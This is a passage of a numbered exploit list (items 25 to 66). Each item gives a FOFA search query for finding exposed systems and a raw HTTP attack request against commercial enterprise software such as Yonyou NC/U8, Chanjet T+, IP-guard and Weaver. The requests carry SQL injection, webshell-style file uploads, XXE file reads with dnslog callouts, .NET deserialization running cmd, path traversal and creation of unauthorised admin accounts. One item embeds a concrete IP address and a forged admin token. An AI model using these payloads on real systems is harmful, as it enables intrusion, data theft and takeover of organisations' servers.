Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) LianAiYun (脸爱云) all-in-one face recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
